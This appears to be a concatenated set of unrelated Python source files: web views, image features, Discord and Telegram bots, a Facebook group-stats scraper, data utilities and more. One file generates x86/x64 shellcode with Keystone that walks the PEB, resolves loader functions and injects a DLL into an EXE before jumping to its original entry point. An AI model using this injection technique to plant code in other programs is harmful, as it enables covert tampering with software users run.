'basetemplate': is_admin and 'confreg/confadmin_base.html' or 'confreg/volunteer_base.html',
'conference': conference,
'admin': is_admin,
'can_admin': can_admin,
'reg': reg,
'slots': slots,
'helplink': 'volunteers',
})
def _signup(request, conference, reg, adm, slot):
if VolunteerAssignment.objects.filter(slot=slot, reg=reg).exists():
return "Already a volunteer for selected slot"
elif slot.countvols >= slot.max_staff:
return "Volunteer slot is already full"
elif VolunteerAssignment.objects.filter(reg=reg, slot__timerange__overlap=slot.timerange).exists():
return "Cannot sign up for an overlapping slot"
else:
a = VolunteerAssignment(slot=slot, reg=reg, vol_confirmed=True, org_confirmed=False)
a.save()
send_volunteer_notification(conference, a, 'Volunteer signed up', 'admin_notify_volunteer_signup.txt')
def _add(request, conference, reg, adm, slot, volid):
addreg = get_object_or_404(ConferenceRegistration, conference=conference, id=volid)
if VolunteerAssignment.objects.filter(slot=slot, reg=addreg).exists():
return "Already a volunteer for selected slot"
elif slot.countvols >= slot.max_staff:
return "Volunteer slot is already full"
elif VolunteerAssignment.objects.filter(reg=addreg, slot__timerange__overlap=slot.timerange).exists():
return "Cannot add to an overlapping slot"
else:
VolunteerAssignment(slot=slot, reg=addreg, vol_confirmed=False, org_confirmed=True).save()
def _remove(request, conference, reg, is_admin, slot, aid):
if is_admin:
a = get_object_or_404(VolunteerAssignment, slot=slot, id=aid)
else:
a = get_object_or_404(VolunteerAssignment, slot=slot, reg=reg, id=aid)
if a.org_confirmed and not is_admin:
return "Cannot remove a confirmed assignment. Please contact the volunteer schedule coordinator for manual processing."
else:
a.delete()
def _confirm(request, conference, reg, is_admin, slot, aid):
if is_admin:
# Admins can make organization confirms
a = get_object_or_404(VolunteerAssignment, slot=slot, id=aid)
if a.org_confirmed:
return "Assignment already confirmed"
else:
a.org_confirmed = True
a.save()
else:
# Regular users can confirm their own sessions only
a = get_object_or_404(VolunteerAssignment, slot=slot, reg=reg, id=aid)
if a.vol_confirmed:
return "Assignment already confirmed"
else:
a.vol_confirmed = True
a.save()
send_volunteer_notification(conference, a, 'Volunteer slot confirmed', 'admin_notify_volunteer_confirmed.txt')
def ical(request, urlname, token):
conference = get_conference_or_404(urlname)
reg = get_object_or_404(ConferenceRegistration, regtoken=token)
assignments = VolunteerAssignment.objects.filter(reg=reg).order_by('slot__timerange')
resp = render(request, 'confreg/volunteer_schedule.ical', {
'conference': conference,
'assignments': assignments,
'now': datetime.utcnow(),
}, content_type='text/calendar')
resp['Content-Disposition'] = 'attachment; filename="{}_volunteer.ical"'.format(conference.urlname)
return resp
|
55826
|
import numpy as np
from PIL import Image
from skimage import color
from skimage.feature import hog
from pelops.features.feature_producer import FeatureProducer
class HOGFeatureProducer(FeatureProducer):
def __init__(self, chip_producer, image_size=(224,224), cells=(16, 16), orientations=8, histogram_bins_per_channel=256):
self.image_size = image_size
self.cells = cells
self.orientations = orientations
self.histogram_bins_per_channel = histogram_bins_per_channel
super().__init__(chip_producer)
def produce_features(self, chip):
"""Takes a chip object and returns a feature vector of size
self.feat_size. """
img = self.get_image(chip)
img = img.resize(self.image_size, Image.BICUBIC)
img_x, img_y = img.size
# Calculate histogram of each channel
channels = img.split()
hist_features = np.full(shape=3 * self.histogram_bins_per_channel, fill_value=-1)
# We expect RGB images. If something else is passed warn the user and
# continue.
if len(channels) < 3:
print("Non-RBG image! Vector will be padded with -1!")
if len(channels) > 3:
print("Non-RBG image! Channels beyond the first three will be ignored!")
channels = channel[:3]
for i, channel in enumerate(channels):
channel_array = np.array(channel)
values, _ = np.histogram(channel_array.flat, bins=self.histogram_bins_per_channel)
start = i * self.histogram_bins_per_channel
end = (i+1) * self.histogram_bins_per_channel
hist_features[start:end] = values
# Calculate HOG features, which require a grayscale image
img = color.rgb2gray(np.array(img))
features = hog(
img,
orientations=self.orientations,
pixels_per_cell=(img_x / self.cells[0], img_y / self.cells[1]),
cells_per_block=self.cells, # Normalize over the whole image
)
return np.concatenate((features, hist_features))
def set_variables(self):
hog_size = self.cells[0] * self.cells[1] * self.orientations
hist_size = 3 * self.histogram_bins_per_channel
self.feat_size = hog_size + hist_size
|
55846
|
import aiohttp
import discord
from discord.ext import commands
class Silphroad(commands.Cog):
"""
Commands related to Silphroad.
"""
def __init__(self, bot):
self.bot = bot
@commands.command(
aliases=["Silphcard", "Scard", "scard", "s-card", "S-card", "silph", "Silph", "Silphroad", "silphroad"])
async def silphcard(self, ctx, name: str):
"""
Shows information of a players silphcard.
Example: *!silphcard trnrtipsnick*
"""
await ctx.message.delete()
async with aiohttp.ClientSession() as client_session:
async with client_session.get(f"https://sil.ph/{name}.json") as response:
json = await response.json()
try:
json = json['data']
except:
embed = discord.Embed(title=f"Error", description=f"{json['error']}",
color=discord.Colour.dark_red())
await self.bot.say(embed=embed, delete_after=10)
return
username = json['in_game_username']
title = json['title']
playstyle = json['playstyle']
goal = json['goal']
team = json['team']
trainer_level = json['trainer_level']
nest_migrations = json['nest_migrations']
avatar_url = json['avatar']
joined = json['joined']
total_xp = json['xp']
home_region = json['home_region']
pokedex_count = json['pokedex_count']
raid_average = json['raid_average']
handshakes = json['handshakes']
checkins = len(json['checkins'])
badges = json['badges']
edited = json['modified']
top_6_pokemon_id = json['top_6_pokemon']
top_6_pokemon_name = ""
try:
for pokemon_id in top_6_pokemon_id:
pokemon_name = await self.bot.get_cog("Utils").get_pokemon_name("%03d" % ((pokemon_id),))
top_6_pokemon_name += "► " + pokemon_name + "\n"
# No favorite mons
except:
pass
embed = discord.Embed(title=f"{title} {username} in {home_region}", description=f"{playstyle}, {goal}",
color=discord.Colour.orange())
embed.add_field(name=":iphone: In-Game",
value=f"**► Level:** {trainer_level}\n**► Team:** {team}\n**► Pokedex:** {pokedex_count}\n**► XP:** {total_xp}\n**► Raids:** ~{raid_average} per week\n\u200b",
inline=True)
embed.add_field(name=":trophy: Silphroad",
value=f"**► Badges:** {len(badges)}\n**► Check-Ins:** {checkins}\n**► Handshakes:** {handshakes}\n**► Joined:** {joined[:10]}\n**► Nest-Migrations:** {nest_migrations}\n\u200b",
inline=True)
embed.add_field(name=":heartpulse: Favourite Pokémon", value=f"{top_6_pokemon_name}\n\u200b", inline=True)
embed.add_field(name=":military_medal: Latest Badge", value=f"► {badges[-1]['Badge']['name']}\n\u200b",
inline=False)
embed.set_thumbnail(url=avatar_url)
embed.set_image(url=f"{badges[-1]['Badge']['image']}")
embed.set_footer(text=f"The Silph Road ▪ Last edit {edited}",
icon_url="https://assets.thesilphroad.com/img/snoo_sr_icon.png")
await ctx.message.channel.send(embed=embed)
def setup(bot):
bot.add_cog(Silphroad(bot))
|
55860
|
import pytest
@pytest.fixture
def board():
return [
[1, 1, 0],
[0, 1, 0],
[1, 1, 1]
]
@pytest.fixture
def board_mirrored():
return [
[0, 1, 1],
[0, 1, 0],
[1, 1, 1]
]
def complete_column(board, column):
return all(row[column] for row in board)
def complete_row(board, row):
return all(board[row])
def complete_diagonal(board, row, column):
size = len(board) # assume square board
if row == column:
return all(board[i][i] for i in range(size))
elif row == (size - column - 1):
return all(board[i][size - i - 1] for i in range(size))
def test_complete_column(board):
assert complete_column(board, 1)
def test_complete_column_false(board):
assert not complete_column(board, 2)
def test_complete_row(board):
assert complete_row(board, 2)
def test_complete_row_false(board):
assert not complete_row(board, 1)
def test_complete_diagonal(board):
assert complete_diagonal(board, 1, 1)
def test_complete_diagonal_mirrored(board_mirrored):
assert complete_diagonal(board_mirrored, 1, 1)
|
55880
|
import json
import os
import time
def get_cache_path():
home = os.path.expanduser("~")
return home + '/package_list.cdncache'
def time_has_passed(last_time, time_now):
time_is_blank = time_now is None or last_time is None
if time_is_blank:
return time_is_blank
time_difference = int(time.time()) - int(last_time)
time_has_passed = time_difference > int(time_now)
print(time_difference)
print(time_has_passed)
return time_has_passed
def get_package_list(path):
packageList = {}
with open(path, 'r') as f:
packageList = json.loads(f.read())
return packageList
def set_package_list(path, packageList):
with open(path, 'w') as f:
f.write(json.dumps(packageList))
|
55896
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from torch.utils.data.sampler import BatchSampler
from .weight import WeightSampler
def get_batch(dataset, config):
# (sampler, batch_size, drop_last):
return None
def get_weight(dataset, config):
return WeightSampler(dataset, [config.train.batch_size.batch1, config.train.batch_size.batch2])
def get_sampler(dataset, config):
f = globals().get('get_'+config.data.sampler)
return f(dataset, config)
|
55914
|
from Queue import Queue # Threadsafe queue for threads to use
from collections import Counter # To count stuff for us
import datetime # Because datetime printing is hard
from pprint import pprint
import time # Should be obvious
import subprocess # Used to send notifications on mac
import sys # Get system info
import threading # Should be obvious
import json # Also obvious
# FB API wrapper ("pip install facebook-sdk")
import facebook
__author__ = '<NAME>'
appeared = dict()
# For printing pretty colors in terminal
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# If you're on mac, install terminal-notifier ("brew install terminal-notifier")
# to get nifty notifications when it's done
def notify_mac():
if sys.platform == "darwin":
try:
subprocess.call(
["terminal-notifier", "-message", "Done", "-title", "FB_Bot",
"-sound", "default"])
except OSError:
print "If you have terminal-notifier, this would be a notification"
# Log message with colors
# ... I never learned the proper way to log in python
def log(message, *colorargs):
if len(colorargs) > 0:
print colorargs[0] + message + color.END
else:
print message
# Junk method used for testing
def test():
log("Test")
# Export method, recieves a jsonObj of style {"label": dictionary}
def exportData(jsonDict):
# Do stuff
print "Exported"
# print jsonDict
# Thread class. Each thread gets all the data from a certain date range
class RequestThread(threading.Thread):
def __init__(self, queue, apikey, query, curr_time, num_weeks):
# Super class
threading.Thread.__init__(self)
# Queue object given from outside. Queues are threadsafe
self.queue = queue
# Graph object for our call, authenticated with a token
self.graph = facebook.GraphAPI(apikey)
# FQL query with specified date range
self.input_query = query
# Counters. t-total, p-posts, c-comments
self.tcounter = Counter()
self.pcounter = Counter()
self.ccounter = Counter()
self.tpcounter = Counter()
self.tccounter = Counter()
self.cccounter = Counter()
# Time range, for logging
self.time_range = datetime.datetime.fromtimestamp(
curr_time - num_weeks).strftime('%Y-%m-%d') + "-" + \
datetime.datetime.fromtimestamp(curr_time).strftime(
'%Y-%m-%d')
# Main runner
def run(self):
log("\t(" + self.time_range + ') - Getting posts...')
# Get group posts
try:
group_posts = self.graph.fql(query=self.input_query)
except facebook.GraphAPIError as e:
# 99% of the time this is just an expired API access token
log("Error: " + str(e), color.RED)
sys.exit()
log("\t(" + self.time_range + ") - " +
str(len(group_posts)) + " posts")
# Iterate over posts
if len(group_posts) != 0:
for post in group_posts:
comments_query = \
"SELECT fromid, likes, id, time FROM comment WHERE post_id="
# If it's a new actor
if post['actor_id'] in appeared.keys():
if appeared[post['actor_id']] > int(post['created_time']):
appeared[post['actor_id']] = int(post['created_time'])
else:
appeared[post['actor_id']] = int(post['created_time'])
# Add post's like count to that user in our total_likes_counter
self.tcounter[post['actor_id']] += post[
'like_info']['like_count']
# Add to top like posts counter
self.pcounter[post['post_id']] = post['like_info'][
'like_count']
# Timestamp of post by
day_timestamp = datetime.datetime.fromtimestamp(int(post['created_time']))
day_timestamp = day_timestamp.replace(hour=0, minute=0, second=0, microsecond=0)
day_timestamp = (day_timestamp - datetime.datetime(1970, 1, 1)).total_seconds()
# Add to post count
self.tpcounter[str(day_timestamp)] += 1
# Initialize controversial counter
self.cccounter[post['post_id']] += 1
# Get likes on comments
comments = self.graph.fql(
comments_query + "\"" + str(post['post_id']) +
"\" LIMIT 350")
# Iterate over comments
if len(comments) != 0:
log("\t(" + self.time_range + ") - " + str(
len(comments)) + " comments")
log("\t(" + self.time_range + ') - Getting comments...')
for c in comments:
# add their like counts to their respective users
# in our total_likes_counter
self.tcounter[c['fromid']] += c['likes']
# add like count to top_comments_likes_counter
self.ccounter[c['id']] = c['likes']
# Add to comment count
self.tccounter[str(day_timestamp)] += 1
# Add to controversial counter
self.cccounter[post['post_id']] += 1
# If it's a new actor
if c['fromid'] in appeared.keys():
if appeared[c['fromid']] > int(c['time']):
appeared[c['fromid']] = int(c['time'])
else:
appeared[c['fromid']] = int(c['time'])
else:
log("\tNo comments from this post")
else:
log("\tNo posts from this time frame")
self.queue.put({'t': self.tcounter, 'p': self.pcounter, 'c':
self.ccounter, 'tp': self.tpcounter,
'tc': self.tccounter, 'cc': self.cccounter})
# Method for counting various total likes in a group
def count_group_likes():
# Access token can be obtained by doing the following:
# - Log into facebook
# - Go to this url: https://developers.facebook.com/tools/explorer
fb_API_access_token = "token_goes_here"
# Only necessary if you want to get an extended access token
# You'll have to make a facebook app and generate a token with it
# You'll also need to get the following two values from it
fb_app_id = "id_goes_here"
fb_secret_key = "key_goes_here"
# Counter object to do the counting for us
total_likes_counter = Counter()
top_liked_posts_counter = Counter()
top_liked_comments_counter = Counter()
total_posts_counter = Counter()
total_comments_counter = Counter()
most_discussed_counter = Counter()
group_id = "id_goes_here" # Unique ID of the group to search.
num_of_items_to_return = 30 # Return the top ____ most liked ____
# Put the number of weeks you want it to increment by each time
# smaller is better, but too small and you could hit your rate limit
# ... which is 600 calls per 600 seconds. Maybe apps get more
num_weeks = int("2")
# Convert to unix time
num_weeks_unix = num_weeks * 604800
# Start date, in unix time (our group was made 2/13/12)
# You can use this to convert: http://goo.gl/4QMFbW
start_date = int("start_date_goes_here")
datetime_start_date = datetime.datetime.fromtimestamp(start_date)
# Query strings for FQL
posts_query = \
"SELECT post_id, like_info, actor_id, created_time FROM stream" + \
" WHERE source_id=" + group_id + " AND created_time<"
person_query = "SELECT first_name, last_name FROM user WHERE uid="
# Authorize our API wrapper
graph = facebook.GraphAPI(fb_API_access_token)
# Code to programatically extend key
if extend_key:
result = graph.extend_access_token(fb_app_id, fb_secret_key)
new_token = result['access_token']
new_time = int(result['expires']) + time.time()
# This will print out new extended token and new expiration date
# Copy them and replace your token above with this one
print 'New token: ' + new_token
print 'New expiration date: ' + datetime.datetime.fromtimestamp(
new_time).strftime('%Y-%m-%d %H:%M:%S')
log('Getting group posts', color.BLUE)
# Send end time to current time and work backward
end_time = int(time.time())
# Or manually set end time
# end_time = <end_time>
log('Current date is: ' + datetime.datetime.fromtimestamp(
end_time).strftime('%Y-%m-%d'))
log('Incrementing by ' + str(num_weeks) + ' weeks at a time')
# List of thread objects
threads = []
# Threadsafe queue for the threads to dump their data in
final_queue = Queue()
log("Initializing threads...", color.BLUE)
# While loop that creates the threads
# Instantiates each thread with calculated time, keeps decrementing to
# start
while end_time > start_date:
# New query
new_query = posts_query + str(
end_time) + " AND created_time>" + \
str(end_time - num_weeks_unix) + " LIMIT 600"
# Thread creation
t = RequestThread(final_queue, fb_API_access_token, new_query,
end_time, num_weeks_unix)
# Add it to our list
threads.append(t)
# Decrement the time
end_time -= num_weeks_unix
# Start the thread
t.start()
log("Joining threads...", color.BLUE)
# Wait for all the threads to finish before counting everything up
for t in threads:
t.join()
log("Done, merging data...", color.BLUE)
# Count up all the data by merging all the counters from each thread result
for stuff in list(final_queue.queue):
total_likes_counter += stuff['t']
top_liked_posts_counter += stuff['p']
top_liked_comments_counter += stuff['c']
total_posts_counter += stuff['tp']
total_comments_counter += stuff['tc']
most_discussed_counter += stuff['cc']
most_active_day_counter = total_posts_counter + total_comments_counter
# Returns key-value list of most liked people
most_common_people = total_likes_counter.most_common(
num_of_items_to_return)
top_posts = top_liked_posts_counter.most_common(num_of_items_to_return)
top_comments = top_liked_comments_counter.most_common(
num_of_items_to_return)
total_posts = total_posts_counter.most_common(num_of_items_to_return)
total_comments = total_comments_counter.most_common(num_of_items_to_return)
most_active_days = most_active_day_counter.most_common(num_of_items_to_return)
most_discussed = most_discussed_counter.most_common(num_of_items_to_return)
top_people_stats = []
# Iterate over top people and retrieve names from their ID's
# Use enumerate to keep track of indices for rank numbers
log('\nPeople Stats', color.BOLD)
log("* = Weighted average calc'd from user's first post date")
for i, x in enumerate(most_common_people):
person = graph.fql(person_query + str(x[0]))[0]
now = datetime.datetime.now()
join_date = datetime.datetime.fromtimestamp(appeared[x[0]])
diff1 = now - datetime_start_date
diff2 = now - join_date
avg = x[1] / (diff1.total_seconds()/60/60/24/7)
weighted_avg = x[1] / (diff2.total_seconds()/60/60/24/7)
top_people_stats.append({
"name": person['first_name'] + " " + person['last_name'],
"likes": x[1],
"avg": avg,
"augmented_avg": weighted_avg,
"first": int((join_date - datetime.datetime(1970, 1, 1)).total_seconds())
})
print '#' + str(i+1) + '. ' + person['first_name'] + " " + person['last_name']
print '-- Likes: ' + str(x[1])
print '-- Weekly average: ' + str(avg)
print '-- Weekly average*: ' + str(weighted_avg)
print '-- First post: ' + join_date.strftime('%Y-%m-%d')
# Iterate over top posts and get info
log('\nTop posts!', color.BOLD)
for x in top_posts:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
# Iterate over top comments and get info
log('\nTop comments!', color.BOLD)
for x in top_comments:
comment = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + comment['from']['name']
print s
if 'message' in comment:
c = str(comment['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(c) > 70:
print '-- ' + c[0:70] + "..."
else:
print '-- ' + c
print '-- http://www.facebook.com/' + comment['id']
# Iterate over total posts/comments and calculate info
log('\nMost active days (by number of posts and comments)', color.BOLD)
for x in most_active_days:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total posts and calculate info
log('\nMost active days (by number of posts)', color.BOLD)
for x in total_posts:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over total comments and calculate info
log('\nMost active days (by number of comments)', color.BOLD)
for x in total_comments:
d = datetime.datetime.fromtimestamp(float(x[0])).strftime('%m/%d/%Y')
print str(x[1]) + " - " + d
# Iterate over top posts and get info
log('\nMost discussed', color.BOLD)
for x in most_discussed:
post = graph.get_object(str(x[0]))
s = str(x[1]) + " - " + post['from']['name'] + " - " + post['type']
print s
if 'message' in post:
m = str(post['message'].encode('ascii', 'ignore')).replace('\n', ' ')
if len(m) > 70:
print '-- ' + m[0:70] + "..."
else:
print '-- ' + m
print '-- http://www.facebook.com/' + post['id']
log('\nExporting...', color.BLUE)
dataDict = json.dumps({"top_people_stats": top_people_stats,
"top_liked_posts_counter": top_liked_posts_counter,
"top_liked_comments_counter": top_liked_comments_counter,
"total_posts_counter": total_posts_counter,
"total_comments_counter": total_comments_counter,
"most_active_day_counter": most_active_day_counter,
"most_common_people": most_common_people,
"top_posts": top_posts,
"top_comments": top_comments,
"total_posts": total_posts,
"total_comments": total_comments,
"most_active_days": most_active_days})
exportData(dataDict)
args = sys.argv
extend_key = False # boolean for if we want to extend token access
if len(args) > 1:
if "--extend" in args: # Pass in flag
extend_key = True
if "test" in args:
test()
sys.exit()
else:
log('No args specified')
count_group_likes()
notify_mac()
|
55916
|
from telegram.ext import Updater, CommandHandler, RegexHandler, MessageHandler, Filters, CallbackQueryHandler
from config import settings, command as cmd
from src import bot
import logging
updater = Updater(token=settings.BOT_TOKEN)
dispatcher = updater.dispatcher
bot = bot.ScheduleBot()
# ********* BASE DISPATCH *********
start_hand = CommandHandler(cmd.START, bot.menu_before_register)
dispatcher.add_handler(start_hand)
main_menu_hand = RegexHandler(cmd.MAIN_MENU, bot.menu_after_register)
dispatcher.add_handler(main_menu_hand)
# ********* AFTER REGISTER DISPATCH *********
today_hand = RegexHandler(cmd.TODAY, bot.get_today)
dispatcher.add_handler(today_hand)
tomorrow_hand = RegexHandler(cmd.TOMORROW, bot.get_tomorrow)
dispatcher.add_handler(tomorrow_hand)
two_day_hand = RegexHandler(cmd.DAY_AFTER_TOMORROW, bot.get_day_after_tomorrow)
dispatcher.add_handler(two_day_hand)
week_hand = RegexHandler(cmd.WEEK, bot.get_week)
dispatcher.add_handler(week_hand)
two_week_hand = RegexHandler(cmd.TWO_WEEK, bot.get_two_week)
dispatcher.add_handler(two_week_hand)
# ********* BEFORE REGISTER DISPATCH *********
about_bot_hand = RegexHandler(cmd.ABOUT_BOT, bot.about)
dispatcher.add_handler(about_bot_hand)
call_back_handler = CallbackQueryHandler(bot.init_search_field)
dispatcher.add_handler(call_back_handler)
register_hand = MessageHandler(Filters.text, bot.register)
dispatcher.add_handler(register_hand)
# ********* ADMIN DISPATCH *********
admin_hand = CommandHandler(cmd.ADMIN_PANEL, bot.admin_panel)
dispatcher.add_handler(admin_hand)
get_my_id = CommandHandler(cmd.GET_MY_ID, bot.get_my_id)
dispatcher.add_handler(get_my_id)
# ========== LOGGING ==========
if settings.LOGGING_ENABLE:
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__)
def error(bot, update, error):
logger.warning('Update "%s" caused error "%s"', update, error)
dispatcher.add_error_handler(error)
|
55918
|
import os
import h5py
import numpy as np
import pandas as pd
import multiprocessing as mp
class Scaler:
def __init__(self, mean=None, std=None):
self.mean = mean
self.std = std
def fit(self, data):
self.mean = np.mean(data)
self.std = np.std(data)
def set_mean(self, mean):
self.mean = mean
def set_std(self, std):
self.std = std
def transform(self, data):
return (data - self.mean) / self.std
def inverse_transform(self, data):
return data * self.std + self.mean
def load_h5(filename, keywords):
f = h5py.File(filename, 'r')
data = []
for name in keywords:
data.append(np.array(f[name]))
f.close()
if len(data) == 1:
return data[0]
return data
def write_h5(filename, d):
f = h5py.File(filename, 'w')
for key, value in d.items():
f.create_dataset(key, data=value)
f.close()
def from_str_to_np(s):
arr = np.fromstring(s, dtype=np.int32, sep=',')
arr = arr.reshape(-1, 3)
return arr
def load_trajectory(filename):
with open(filename) as f:
lines = f.readlines()
pool = mp.Pool()
trajectory = pool.map(from_str_to_np, lines)
return trajectory
def fill_missing(data):
T, N, D = data.shape
data = np.reshape(data, (T, N * D))
df = pd.DataFrame(data)
df = df.fillna(method='pad')
df = df.fillna(method='bfill')
data = df.values
data = np.reshape(data, (T, N, D))
data[np.isnan(data)] = 0
return data
|
55946
|
import os
import sys
from keystone import *
sys.path.append("./../../util/script/")
import shellcode
def gen_oepinit_code32():
ks = Ks(KS_ARCH_X86, KS_MODE_32)
code_str = f"""
// for relative address, get the base of addr
push ebx;
call getip;
lea ebx, [eax-6];
// get the imagebase
mov eax, 0x30; // to avoid relative addressing
mov edi, dword ptr fs:[eax]; //peb
mov edi, [edi + 0ch]; //ldr
mov edi, [edi + 14h]; //InMemoryOrderLoadList, this
mov edi, [edi -8h + 18h]; //this.DllBase
// get loadlibrarya, getprocaddress
mov eax, [ebx + findloadlibrarya];
add eax, edi;
call eax;
mov [ebx + findloadlibrarya], eax;
mov eax, [ebx + findgetprocaddress];
add eax, edi;
call eax;
mov [ebx + findgetprocaddress], eax;
// reloc
mov eax, [ebx + dllrva];
add eax, edi;
push eax;
push eax;
mov eax, [ebx + memrelocrva];
add eax, edi;
call eax;
// bind iat
mov eax, [ebx + findgetprocaddress];
push eax; // arg3, getprocaddress
mov eax, [ebx + findloadlibrarya];
push eax; // arg2, loadlibraryas
mov eax, [ebx + dllrva];
add eax, edi;
push eax; // arg1, dllbase value
mov eax, [ebx + membindiatrva];
add eax, edi
call eax;
// bind tls
xor eax, eax;
inc eax;
push eax; // arg2, reason for tls
mov eax, [ebx + dllrva]
add eax, edi;
push eax; // arg1, dllbase
mov eax, [ebx + membindtlsrva];
add eax, edi;
call eax;
// call dll oep, for dll entry
xor eax, eax;
push eax; // lpvReserved
inc eax;
push eax; // fdwReason, DLL_PROCESS_ATTACH
mov eax, [ebx + dllrva];
add eax, edi;
push eax; // hinstDLL
mov eax, [ebx + dlloeprva];
add eax, edi;
call eax;
// jmp to origin oep
mov eax, [ebx + exeoeprva];
add eax, edi;
pop ebx;
jmp eax;
getip:
mov eax, [esp]
ret
exeoeprva: nop;nop;nop;nop;
dllrva: nop;nop;nop;nop;
dlloeprva: nop;nop;nop;nop;
memrelocrva: nop;nop;nop;nop;
membindiatrva: nop;nop;nop;nop;
membindtlsrva: nop;nop;nop;nop;
findloadlibrarya: nop;nop;nop;nop;
findgetprocaddress: nop;nop;nop;nop;
"""
# print("gen_oepinit_code32", code_str)
payload, _ = ks.asm(code_str)
# print("payload: ", [hex(x) for x in payload])
return payload
def gen_oepinit_code64():
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code_str = f"""
// for relative address, get the base of addr
call getip;
lea rbx, [rax-5];
push rcx;
push rdx;
push r8;
push r9;
sub rsp, 0x28; // this is for memory 0x10 align
// get the imagebase
mov rax, 0x60; // to avoid relative addressing
mov rdi, qword ptr gs:[rax]; //peb
mov rdi, [rdi + 18h]; //ldr
mov rdi, [rdi + 20h]; //InMemoryOrderLoadList, this
mov rdi, [rdi -10h + 30h]; //this.DllBase
// get loadlibrarya, getprocaddress
mov rax, [rbx + findloadlibrarya];
add rax, rdi;
call rax;
mov [rbx + findloadlibrarya], rax;
mov rax, [rbx + findgetprocaddress];
add rax, rdi;
call rax;
mov [rbx + findgetprocaddress], rax;
// reloc
mov rcx, [rbx + dllrva];
add rcx, rdi;
mov rdx, rcx;
mov rax, [rbx + memrelocrva];
add rax, rdi;
call rax;
// bind iat
mov r8, [rbx + findgetprocaddress]; // arg3, getprocaddress
mov rdx, [rbx + findloadlibrarya]; // arg2, loadlibraryas
mov rcx, [rbx + dllrva];
add rcx, rdi; // arg1, dllbase value
mov rax, [rbx + membindiatrva];
add rax, rdi
call rax;
// bind tls
xor rdx, rdx;
inc rdx; // argc, reason for tls
mov rcx, [rbx + dllrva]
add rcx, rdi; // arg1, dllbase
mov rax, [rbx + membindtlsrva];
add rax, rdi;
call rax;
// call dll oep, for dll entry
xor r8, r8; // lpvReserved
xor rdx, rdx;
inc rdx; // fdwReason, DLL_PROCESS_ATTACH
mov rcx, [rbx + dllrva];
add rcx, rdi; // hinstDLL
mov rax, [rbx + dlloeprva];
add rax, rdi;
call rax;
// jmp to origin oep
add rsp, 0x28;
pop r9;
pop r8;
pop rdx;
pop rcx;
mov rax, [rbx+exeoeprva];
add rax, rdi;
jmp rax;
getip:
mov rax, [rsp]
ret
exeoeprva: nop;nop;nop;nop;nop;nop;nop;nop;
dllrva: nop;nop;nop;nop;nop;nop;nop;nop;
dlloeprva: nop;nop;nop;nop;nop;nop;nop;nop;
memrelocrva: nop;nop;nop;nop;nop;nop;nop;nop;
membindiatrva: nop;nop;nop;nop;nop;nop;nop;nop;
membindtlsrva: nop;nop;nop;nop;nop;nop;nop;nop;
findloadlibrarya: nop;nop;nop;nop;nop;nop;nop;nop;
findgetprocaddress: nop;nop;nop;nop;nop;nop;nop;nop;
"""
# print("gen_oepinit_code64", code_str)
payload, _ = ks.asm(code_str)
# print("payload: ", [hex(x) for x in payload])
return payload
def gen_oepinitstatic_code32():
ks = Ks(KS_ARCH_X86, KS_MODE_32)
code_str = f"""
push eax
push ebx
call getip;
lea ebx, [eax-7];
mov eax, [ebx + dllnameva];
push eax;
mov eax, [ebx + loadlibraryva]
call eax;
mov eax, [ebx + retva];
mov edi, eax;
pop ebx;
pop eax;
jmp edi;
getip:
mov eax, [esp]
ret
retva:nop;nop;nop;nop;
dllnameva:nop;nop;nop;nop;
loadlibraryva:nop;nop;nop;nop;
"""
payload, _ = ks.asm(code_str)
return payload
def gen_oepinitstatic_code64():
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code_str = f"""
push rax;
push rbx;
push rcx;
push rdx;
call getip;
lea rbx, [rax-9];
sub rsp, 0x28;
mov rcx, [rbx + dllnameva];
mov rax, [rbx + loadlibraryva]
call rax;
add rsp, 0x28;
mov rax, [rbx + retva];
mov r15, rax;
pop rdx;
pop rcx;
pop rbx;
pop rax;
jmp r15;
getip:
mov rax, [rsp];
ret;
retva:nop;nop;nop;nop;nop;nop;nop;nop;
dllnameva:nop;nop;nop;nop;nop;nop;nop;nop;
loadlibraryva:nop;nop;nop;nop;nop;nop;nop;nop;
"""
payload, _ = ks.asm(code_str)
return payload
def make_winpe_shellcode(libwinpepath, postfix):
codes = dict()
libwinpe = shellcode.extract_coff(libwinpepath)
# for static inject dll into exe oepinit code
codes[f'g_oepinit_code{postfix}'] = eval(f'gen_oepinit_code{postfix}()')
# for dynamic inject dll into exe oepint code
codes[f'g_oepinitstatic_code{postfix}'] = eval(f'gen_oepinitstatic_code{postfix}()')
for name, code in libwinpe.items():
newname = f"g_{name.replace('winpe_', '').lower()}_code{postfix}"
codes[newname] = code
return codes
def debug():
gen_oepinitstatic_code64()
codes = shellcode.extract_coff("./bin/winpe_shellcode32.obj")
pass
def main():
codes = dict()
codes.update(make_winpe_shellcode(sys.argv[1], '32'))
codes.update(make_winpe_shellcode(sys.argv[2], '64'))
shellcode.write_shellcode_header(codes, outpath=sys.argv[3])
if __name__ == '__main__':
# debug()
main()
pass
|
55950
|
import pprint
import os
class ServerProps:
def __init__(self, filepath):
self.filepath = filepath
self.props = self._parse()
def _parse(self):
"""Loads and parses the file speified in self.filepath"""
with open(self.filepath) as fp:
line = fp.readline()
d = {}
if os.path.exists(".header"):
os.remove(".header")
while line:
if '#' != line[0]:
s = line
s1 = s[:s.find('=')]
if '\n' in s:
s2 = s[s.find('=')+1:s.find('\\')]
else:
s2 = s[s.find('=')+1:]
d[s1] = s2
else:
with open(".header", "a+") as h:
h.write(line)
line = fp.readline()
return d
def print(self):
"""Prints the properties dictionary (using pprint)"""
pprint.pprint(self.props)
def get(self):
